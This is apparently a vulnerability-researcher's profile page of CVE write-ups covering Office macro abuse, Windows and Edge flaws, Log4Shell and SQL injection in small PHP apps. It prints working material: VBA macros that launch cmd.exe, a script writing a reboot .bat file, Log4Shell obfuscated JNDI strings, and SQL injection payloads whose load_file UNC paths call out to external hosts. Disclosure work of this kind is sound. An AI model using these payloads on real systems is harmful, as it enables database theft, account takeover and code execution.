nu11secur1ty (173)

Last Login: April 01, 2023
Assessments
81
Score
173
6th Place

nu11secur1ty's Latest (20) Contributions

Sort by:
Filter by:
1
Ratings
Technical Analysis

CVE-2023-23398

Description:

The attack itself is carried out locally by a user with authentication to the targeted system. An attacker could exploit the vulnerability by convincing a victim, through social engineering, to download and open a specially crafted file from a website which could lead to a local attack on the victim’s computer. The attacker can trick the victim to open a malicious web page by using an Excel malicious file and he can steal credentials, bank accounts information, sniffing and tracking all the traffic of the victim without stopping – it depends on the scenario and etc.

Reference:

href

href

Proof and Exploit

href

m0r3:

href

2

(but I can’t image it is simply the shell function in VBA, that’s been a vector for some time. Any additional info would be appreciated.)
Yes, my dear friend and it has been for a long time. If you remember, a long time ago Microsoft allowed VBA execution from Internet Explorer, which is the same STUPID decision, etc…
BR =)

1
Ratings
Technical Analysis

CVE-2023-23396 – Code Name Butterfly Effect

Description:

The attacker could exploit this vulnerability by convincing a victim to open a specially crafted XLSX file which when opened would cause a denial-of-service condition for other processes running on that machine. The victim can lose all the work – information which he currently works on it, and the company which is the actual employer of this victim can lose money because of this problem.

Reference:

href

Proof and Exploit:

href

Time spend:

03:00:00

1
Ratings
Technical Analysis

CVE-2023-23399

Description:

The malicious user can exploit the victim’s PC remotely.
For example, when the score indicates that the Attack Vector is Local and User Interaction is Required, this could describe an exploit in which an attacker, through social engineering, convinces a victim to download and open a specially crafted file from a website which leads to a local attack on their computer.
In this case, the malicious excel file create a very dangerous shell execution file, and after the victim will execute it, his PC maybe will never wake up normally, it depends on the case, which is very nasty.

STATUS: HIGH Vulnerability

[+]Exploit0:

Sub Check_your_salaries()
CreateObject("Shell.Application").ShellExecute "microsoft-edge:https://pornhub.com/"
End Sub

[+]Exploit1:

Sub cmd()
Dim Program As String
Dim TaskID As Double
On Error Resume Next
Program = "cmd.exe"
TaskID = Shell(Program, 1)
If Err <> 0 Then
MsgBox "Can't start " & Program
End If
End Sub

Reproduce:

href

Proof and Exploit:

href

Proof and Exploit, danger example:

href

Time spend:

03:00:00

1
Ratings
Technical Analysis

CVE-2023-21752 – Windows Backup service – Privilege Escalation

Description:

Windows 11 Pro build 10.0.22000 Build 22000 suffers from Backup service – Privilege Escalation vulnerability.
An attacker who successfully exploited this vulnerability could gain SYSTEM privileges
and could delete data that could include data that results in the service being unavailable.

STATUS: HIGH Vulnerability – CRITICAL

[+] Exploit:

href

Reproduce:

href

Proof and Exploit:

href

Reference:

href

FAQ from Microsoft

What privileges could be gained by an attacker who successfully exploited the vulnerability?
An attacker who successfully exploited this vulnerability could gain SYSTEM privileges.
According to the CVSS metrics, successful exploitation of this vulnerability could lead to no loss of confidentiality (C:N) but have major impact on integrity (I:H) and on availability (A:H). What does that mean for this vulnerability?
This vulnerability does not allow disclosure of any confidential information, but could allow an attacker to delete data that could include data that results in the service being unavailable.

RPC

Remote procedure call (RPC)

Affected Releases:

Jan 10, 2023
Windows 10 Version 1809 for 32-bit Systems
-
Elevation of Privilege
Important
5022286 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 10 Version 20H2 for ARM64-based Systems
-
Elevation of Privilege
Important
5022282 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 10 Version 20H2 for 32-bit Systems
-
Elevation of Privilege
Important
5022282 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 10 Version 20H2 for x64-based Systems
-
Elevation of Privilege
Important
5022282 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 11 Version 22H2 for x64-based Systems
-
Elevation of Privilege
Important
5022303 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 10 Version 21H2 for x64-based Systems
-
Elevation of Privilege
Important
5022282 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 10 Version 22H2 for x64-based Systems
-
Elevation of Privilege
Important
5022282 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 10 Version 21H2 for 32-bit Systems
-
Elevation of Privilege
Important
5022282 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 11 version 21H2 for ARM64-based Systems
-
Elevation of Privilege
Important
5022287 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 11 version 21H2 for x64-based Systems
-
Elevation of Privilege
Important
5022287 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 10 Version 21H2 for ARM64-based Systems
-
Elevation of Privilege
Important
5022282 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 10 Version 22H2 for 32-bit Systems
-
Elevation of Privilege
Important
5022282 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 11 Version 22H2 for ARM64-based Systems
-
Elevation of Privilege
Important
5022303 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 10 Version 22H2 for ARM64-based Systems
-
Elevation of Privilege
Important
5022282 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 7 for 32-bit Systems Service Pack 1
-
Elevation of Privilege
Important
5022338 
5022339 
Monthly Rollup 
Security Only 
CVE-2023-21752
Jan 10, 2023
Windows 10 for 32-bit Systems
-
Elevation of Privilege
Important
5022297 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 10 Version 1607 for x64-based Systems
-
Elevation of Privilege
Important
5022289 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 10 for x64-based Systems
-
Elevation of Privilege
Important
5022297 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 7 for x64-based Systems Service Pack 1
-
Elevation of Privilege
Important
5022338 
5022339 
Monthly Rollup 
Security Only 
CVE-2023-21752
Jan 10, 2023
Windows 10 Version 1809 for x64-based Systems
-
Elevation of Privilege
Important
5022286 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 10 Version 1607 for 32-bit Systems
-
Elevation of Privilege
Important
5022289 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 10 Version 1809 for ARM64-based Systems
-
Elevation of Privilege
Important
5022286 
Security Update 
CVE-2023-21752
1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

Description:

The author parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks.
The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes.

STATUS: HIGH Vulnerability

[+]Payload:

---
Parameter: author (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: author=-5045' OR 8646=8646 AND 'YeVm'='YeVm&p_id=4

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: author=admin'+(select load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+'' OR (SELECT 7539 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT (ELT(7539=7539,1))),0x7170716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'mwLN'='mwLN&p_id=4

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: author=admin'+(select load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+'' AND (SELECT 6824 FROM (SELECT(SLEEP(5)))QfTF) AND 'zVTI'='zVTI&p_id=4

    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: author=admin'+(select load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+'' UNION ALL SELECT NULL,NULL,CONCAT(0x717a6a6a71,0x4f617a456c7953617866546b7a666d49434d644662587149734b6d517a4e674d5471615a73616d58,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&p_id=4
---

Reproduce:

href

Proof and Exploit:

href

0
Ratings
Technical Analysis

CVE-2022-30174

Description:

Microsoft Office Remote Code Execution Vulnerability.
This attack requires a specially crafted file to be placed either in an online directory or in a local network location.
When a victim runs this file, it loads the malicious DLL or EXE file.

WARNING:

Use your Windows Defender turned on and update him regularly!!!

Conclusion:

    • So. I’ve decided to test this stupid and forever stupid thing MS Office 365 which is from 7 maybe 10 years just like that. Some things will never change.
  • Tested on Windows 11.

  • 365 don’t give a f*** what you give him to execute, it depends on the lure…

  • For the usual users: If you don’t have some virus protection software, you are lost…😯 😝 🤫 😛 😎

  • STATUS: Medium vulnerability but it is there! Watch out, dear friends! 😎

Proof and Exploit:

href

0
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Medium
Technical Analysis

CVE-2022-29110

Description:

The Microsoft 365 version 2204-Build-15128.20178 is vulnerable to RCE.
The malicious attacker can share a malicious .docm file in some of the internal or external networks by using an FTP malicious server and he can infect all computers in this network. The infected user can visit a very dangerous website and when he clicks it he can execute a bunch of javascript malicious codes or can execute a dangerous local code! Also, the malicious author can use a USB flash memory to infect every computer by using Microsoft 365 software.

Known Affected Software

Vendor 	Product 	Version
Microsoft 	Microsoft_Excel	2016 (32-bit edition)
Microsoft 	Microsoft_Excel	2016 (64-bit edition)
Microsoft 	Microsoft_Excel	2013 RT Service Pack 1
Microsoft 	Microsoft_Excel	2013 Service Pack 1 (32-bit editions)
Microsoft 	Microsoft_Excel	2013 Service Pack 1 (64-bit editions)
Microsoft 	Microsoft_Office_Web_Apps	Server 2013 Service Pack 1

Reproduce:

href

Proof and Exploit

href

1
Ratings
Technical Analysis

CVE-NU11-2021-1101

Description:

The OPH – PHP (by: oretnom23 ) v1.0 is vulnerable to remote SQL-Injection-Bypass-Authentication and PHPSESSID Hijacking.
remote SQL-Injection-Bypass-Authentication: https://portswigger.net/support/using-sql-injection-to-bypass-authentication.
The parameter (username) from the login form is not protected correctly and there is no security and escaping from malicious payloads.
When the user will sending a malicious query or malicious payload to the MySQL server for those three accounts, he can bypass the login credentials and take control of these accounts.
Also, the attacker can use PHPSSESSID to steal the session to the admin account. Disaster, online payment system WTF.

Reproduce:

href

Proof

href

1
Ratings
Technical Analysis

CVE-2022-21906

Microsoft

Vendor

Description

Windows Defender Application Control Security Feature Bypass Vulnerability.
The attacker can execute extremely dangerous apps by using different scenarios,
directly from the user profile, without any reaction from the side of the Windows Defender.
Read more: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21906

The latest version of Windows 10 Pro, plus the latest update!

Reproduce:

href

Proof and Exploit

href

BugCheck after the exploit, the reaction of the kernel:

  • BSOD.exe
1: kd> !analyze
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

Unknown bugcheck code (c0000022)
Unknown bugcheck description
Arguments:
Arg1: 0000000000000000
Arg2: 0000000000000000
Arg3: 0000000000000000
Arg4: 0000000000000000

Debugging Details:
------------------


ERROR_CODE: (NTSTATUS) 0xc0000022 - {Access Denied}  A process has requested access to an object, but has not been granted those access rights.

BUGCHECK_CODE:  c0000022

BUGCHECK_P1: 0

BUGCHECK_P2: 0

BUGCHECK_P3: 0

BUGCHECK_P4: 0

PROCESS_NAME:  BSOD.exe

SYMBOL_NAME:  nt!PopTransitionSystemPowerStateEx+1217

MODULE_NAME: nt

IMAGE_NAME:  ntkrnlmp.exe

FAILURE_BUCKET_ID:  STATUS_ACCESS_DENIED_nt!PopTransitionSystemPowerStateEx

FAILURE_ID_HASH:  {7fcb0a96-b639-2e09-82d6-2eef48bdcdea}

Followup:     MachineOwner
---------
  • malicious.exe
0: kd> !analyze
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

Unknown bugcheck code (c0000022)
Unknown bugcheck description
Arguments:
Arg1: 0000000000000000
Arg2: 0000000000000000
Arg3: 0000000000000000
Arg4: 0000000000000000

Debugging Details:
------------------


ERROR_CODE: (NTSTATUS) 0xc0000022 - {Access Denied}  A process has requested access to an object, but has not been granted those access rights.

BUGCHECK_CODE:  c0000022

BUGCHECK_P1: 0

BUGCHECK_P2: 0

BUGCHECK_P3: 0

BUGCHECK_P4: 0

PROCESS_NAME:  malicious.exe

SYMBOL_NAME:  nt!PopTransitionSystemPowerStateEx+1217

MODULE_NAME: nt

IMAGE_NAME:  ntkrnlmp.exe

FAILURE_BUCKET_ID:  STATUS_ACCESS_DENIED_nt!PopTransitionSystemPowerStateEx

FAILURE_ID_HASH:  {7fcb0a96-b639-2e09-82d6-2eef48bdcdea}

Followup:     MachineOwner
---------

BR

.\nu11secur1ty

1
Ratings
Technical Analysis

CVE-2022-21970

Description

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability.
This vulnerability allows an attacker to execute javascript code on every host without permission, also an attacker can steal local system files, and also he can manipulate the actions against the machine and result in changing internal developer settings in Microsoft Edge.

  • NOTE: In this example, Microsoft Edge executes a malicious script without problems.
    This is just a malicious .bat file that reboots the infected machine, and it’s only for testing!
    The attacker can create a malicious file that can take a privileges escalation, malware, spyware, or kernel exploit file and harm seriously your device!
    Not correctly sanitizing and checking for that what users download on their machines by using a MsEdge!

NOTE after the exploit: A malicious user, or whatever user can execute directly malicious .bat files which are created – generated from this javascript exploit by using MsEdge. 😁
According to Edge, this file is safe to run and open. 😁


FAQ

What is the version information for this release?

Microsoft Edge Version Date Released Based on Chromium Version

97.0.1072.55 | 1/6/2022 | 97.0.4692.71

STATUS:

  • Patched and fixed on!


The next test is checking if this is fully patched! 🤫 😛 😎

Proof and simple browser test MsEdge: Edge is blocking .sys files because they can harm your device:

This proof of concept is shown as to how the MsEdge browser NOT blocking .bat files, and this is a problem.

  • NOTE: A malicious user, or whatever user can execute directly malicious .bat files which are created – generated by using exactly MsEdge and this javascript exploit.

  • This is ridiculous and incorrect sanitizing!😁

  • According to Edge, this file is safe to run and open. 😁

  • Screenshot, example:

In Action:

  1. download the PoC

  2. extracted somewhere

  3. Execute

start msedge C:\Users\user2022\Desktop\ExploitServer\examples\exploit.html

Example from the function():

    $start.onclick = () => {
        const blob = new Blob(['shutdown /r'])
        const fileStream = streamSaver.createWriteStream('pwned.bat', {
          size: blob.size // Makes the percentage visiable in the download
        })

Reproduce:

href

Proof and Exploit:

href

  • BR nu11secur1ty
1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-2021-44655

Software

Vendor

Description:

The bid, c & id parameters from /used_car_showroom/ node app on Online-Pre-owned/Used Car Showroom Management 1.0 system appear to be vulnerable to Multiple time-based blind SQL injection attacks. The payload ‘+(select load_file(’\2z2p3k6kl8xuxf3ykb2dc84ocfi8600orrfi29qy.nu11secur1typenetrationtestingengineer.net\nxj’))+’ was submitted in the bid parameter. This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can take administrator account control on this system. Status: CRITICAL

[+] Payloads:

  • Multiple: bit, c & id
---
Parameter: bid (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=product_per_brand&bid=7'+(select load_file('\\\\2z2p3k6kl8xuxf3ykb2dc84ocfi8600orrfi29qy.nu11secur1typenetrationtestingengineer.net\\nxj'))+'' AND (SELECT 3670 FROM (SELECT(SLEEP(5)))hxug) AND 'ovPl'='ovPl
---


---
Parameter: c (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=categories&c=2'+(select load_file('\\\\xyzk2f5fk3wpwa2tj618b33jbah35vvjmmadx4lt.nu11secur1typenetrationtestingengineers.net\\thk'))+'' AND (SELECT 4821 FROM (SELECT(SLEEP(3)))DuhP) AND 'vkhG'='vkhG
---


---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=view_product&id=3'+(select load_file('\\\\rc7eg9j9yxaja4gnx0f2pxhdp4vxj17sag13srh.nu11secur1typenetrationtestingengineers.net\\deo'))+'' AND (SELECT 8828 FROM (SELECT(SLEEP(3)))VaSc) AND 'gDVf'='gDVf
---

Reproduce:

href

Proof and Exploit:

href

2
Ratings
Technical Analysis

Software

More

CVE

Protect yourself, before you break yourself… ;)

Description:

Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

Usage and explanation:

  • Demonstration of scanning for Log4j vulnerability

    • NOTE: For advanced users!
  • Manual installing the extension for BurpSuite

IMPORTANT:

  • Check in to BApp Store if all components are deployed!


>>> from log4shell_regexes import *

>>> t = lambda s: [k for k in test(s)]
>>> tt = lambda s: [(k, list(v.keys())) for k, v in test_thorough(s).items()]

>>> t('${ jndi\t: addr\n}')
['SIMPLE_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'SIMPLE_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']

>>> t('${ jndi\t: addr\n')
['SIMPLE_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']

>>> t('\044%7B\\44{env:NOTHING:-j}\u0024{lower:N}\\u0024{lower:${upper:d}}}i:addr}')
['SIMPLE_ESC_VALUE_RE', 'NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'SIMPLE_ESC_VALUE_OPT_RCURLY_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']

>>> t('${base64:d2hvIHRob3VnaHQgYW55IG9mIHRoaXMgd2FzIGEgZ29vZCBpZGVhPwo=}')
['ANY_RE', 'ANY_INCL_ESCS_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']

>>> t('%24%7Bjnd%24%7Bupper%3A%C4%B1%7D%3Aaddr%7D')
['NESTED_INCL_ESCS_RE', 'ANY_INCL_ESCS_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']

>>> t('$%7B\u006a\\156di:addr\\x7d')
['ANY_INCL_ESCS_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']

>>> t('${jndi:${lower:l}${lower:d}a${lower:p}://$a{upper:d}dr}')
['SIMPLE_RE', 'NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'SIMPLE_OPT_RCURLY_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']

>>> t('${jndi:dns://addr}')
['SIMPLE_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'SIMPLE_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']

>>> t('${${base64:am5kaTpsZGFwOi8vYWRkcgo=}}') # LOG4J2-2446
['NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']

>>> t('${jndi:${lower:l}${lower:d}a${lower:p}://addr')
['SIMPLE_RE', 'NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'SIMPLE_OPT_RCURLY_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']

>>> t('${${::-j}nd${upper:ı}:rm${upper:ı}://addr}')
['NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']

>>> t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//addr}')
['NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']

>>> t('%5Cu002524%257Bjnd%2524%257Bupper%255Cu003a%255C%255C461%257D%253Aldap%253A%5C0452F%252Faddr%257D')
[]

>>> tt('%5Cu002524%257Bjnd%2524%257Bupper%255Cu003a%255C%255C461%257D%253Aldap%253A%5C0452F%252Faddr%257D')
[
	(
		'\\u002524%7Bjnd%24%7Bupper%5Cu003a%5C%5C461%7D%3Aldap%3A\\0452F%2Faddr%7D',
		['NESTED_INCL_ESCS_RE', 'ANY_INCL_ESCS_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']
	), (
		'${jnd${upper\\u003a\\\\461}:ldap://addr}',
		['SIMPLE_ESC_VALUE_RE', 'NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'SIMPLE_ESC_VALUE_OPT_RCURLY_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']
	), (
		'${jnd${upper:\\461}:ldap://addr}',
		['SIMPLE_ESC_VALUE_RE', 'NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'SIMPLE_ESC_VALUE_OPT_RCURLY_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']
	), (
		'${jnd${upper:ı}:ldap://addr}',
		['NESTED_RE', 'NESTED_INCL_ESCS_RE', 'ANY_RE', 'ANY_INCL_ESCS_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCL_ESCS_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCL_ESCS_OPT_RCURLY_RE']
	)
]

Docker vulnerable app:

cd vuln_app/CVE-2021-44228-VULN-APP/
docker build -t log4j-shell-poc .
docker run --network host log4j-shell-poc
  • Listening on port 8080

Support for vulnerable machine APP by

  • kozmer

Support for Burp module by

  • silentsignal

Demo, testing, and debugging by

  • nu11secur1ty

Video and reproduce of the vulnerability

  • NOTE: The test is outside of the credentials for login! ;)

href


More

Information

Scanner

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

Online-Enrollment-Management-System

Vendor

Description:

The id parameter from Online Enrollment Management System 1.0 appears to be vulnerable to SQL injection attacks.
The payload (select load_file(’\\5bhtyx01jb7u7d6h2uthd4khq8w1ktch3jrbe12q.nu11secur1typentestingengineer.net\ofp’)) was submitted in the id parameter. This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed.
The attacker can retrieve sensitive information for all users of this system.
STATUS: Critical and Awful.

Mysql Request:

POST /onlineenrolmentsystem/menu1.php HTTP/1.1
Host: 192.168.10.73
Origin: http://192.168.10.73
Cookie: PHPSESSID=5hjqmc8ms45586p1rqdv1ld9gd
Accept: text/plain, */*; q=0.01
X-Requested-With: XMLHttpRequest
Referer: http://192.168.10.73/onlineenrolmentsystem/index.php?q=department
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 5

id=(select%20load_file('%5c%5c%5c%5c5bhtyx01jb7u7d6h2uthd4khq8w1ktch3jrbe12q.nu11secur1typenetrationtestingengineer.net%5c%5cofp'))

MySQL Response:

HTTP/1.1 200 OK
Date: Fri, 03 Dec 2021 12:11:35 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 159
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- Projects Row -->
<div class="row">
<div class="col-md-12">
<ul>


</ul>
</div>
</div>
<!-- /.row -->

Reproduce:

href

Proof and Exploit:

href

1
Ratings
Technical Analysis

CVE-2021-41646

Vendor

Description:

Remote Code Execution (RCE) vulnerability exists in Sourcecodester Online Reviewer System 1.0 by uploading a maliciously crafted PHP file that bypasses the image upload filters.
The vulnerable directory can be used by the directory traversal method in the browser from the attacker to retrieve sensitive information or destroy the system by using an RCE method for this action!
Status: CRITICAL

Reproduce:

href

Proof and Exploit

href

1
Ratings
Technical Analysis

CVE-2021-42668

Vendor

Description

The id from my_classmates.php in Engineers Online Portal 1.0 parameter appears to be vulnerable to SQL injection and RCE attacks.
The payload ‘+(select load_file(’\\n0o5m5xdxay49mw826umfj1wsnygm9ix90xrkh86.nu11secur1tyPenetrationTestingEngineer.net\sch’))+’ was submitted in the id parameter.
This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed.
The attacker can bypass the admin account and he can upload a malicious code by using the avatar vulnerability function with directory traversal method,
then he can execute this malicious code. For this example, the attacker destroys all files in the current directory.
STATUS Hiper Critical and Awful.
CONCLUSION: This pseudo developer must be stopped immediately.

MySQL Request:

GET /nia_munoz_monitoring_system/my_classmates.php?id=189' HTTP/1.1
Host: 192.168.1.2
Cookie: PHPSESSID=k6gnppcljj6b7vs8ua3tdefmkt
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.2/nia_munoz_monitoring_system/dashboard_student.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
Cache-Control: max-age=0

MySQL Response:


HTTP/1.1 200 OK
Date: Fri, 03 Dec 2021 17:54:59 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 5946
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html class="no-js">
<head>
<title>NIA Project Monitoring System</title>
       <meta name="description" content="Learning Management System">
       <meta name="keywords" conte
...[SNIP]...
<ul     id="da-thumbs" class="da-thumbs">
                                        You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''189'' order by lastname' at line 4

Reproduce:

href

Proof and Exploit:

href

M0r3:

Proof and Explot:

href

1
Ratings
Technical Analysis

CVE-2021-37808

Vendor

Description:

The searchtitle parameter from News Portal Project 3.1 appears to be vulnerable to SQL injection attacks.
The payload ‘+(select load_file(’\\wddcdzjvtmxtfkwxdw5gwdmxpovhj99x00osbiz7.nu11secur1tycollaborator.net\lni’))+’ was submitted in the searchtitle parameter.
This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can be retrieving sensitive information
for all accounts of this system, and he can manipulate them!
STATUS: Critical and awful.

Reproduce:

href

Proof and Exploit:

href

1
Ratings
Technical Analysis

CVE-2021-41492

Software

Description:

The username parameter from Sourcecodester Simple Cashiering System (POS) 1.0 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the username parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. The attacker can retrieve sensitive information from the database for all users, and also administrator account!

MySQL Request:

POST /cashiering/Actions.php?a=login HTTP/1.1
Host: 192.168.10.63
Origin: http://192.168.10.63
Cookie: PHPSESSID=bgtkft2eqoj6s4ajhp414erka3
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Referer: http://192.168.10.63/cashiering/login.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 37

username=tralala'&password=@32e23eq3r

MySQL Response:

HTTP/1.1 200 OK
Date: Wed, 01 Dec 2021 12:06:18 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 521
